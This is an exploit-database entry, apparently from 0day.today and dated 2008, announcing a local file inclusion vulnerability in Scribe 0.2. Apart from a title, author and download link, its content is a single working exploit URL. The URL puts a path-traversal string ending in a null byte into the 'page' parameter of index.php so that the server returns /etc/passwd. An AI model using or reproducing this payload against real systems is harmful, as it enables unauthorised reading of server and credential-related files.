id: 2642
date: 02/14/2008
title: Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability
author: muuratsalo
cves: 

=================================================================
Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability
=================================================================



scribe 0.2 local file inclusion vulnerability

download   http://sourceforge.net/projects/scribe/
author     muuratsalo

exploit 
http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #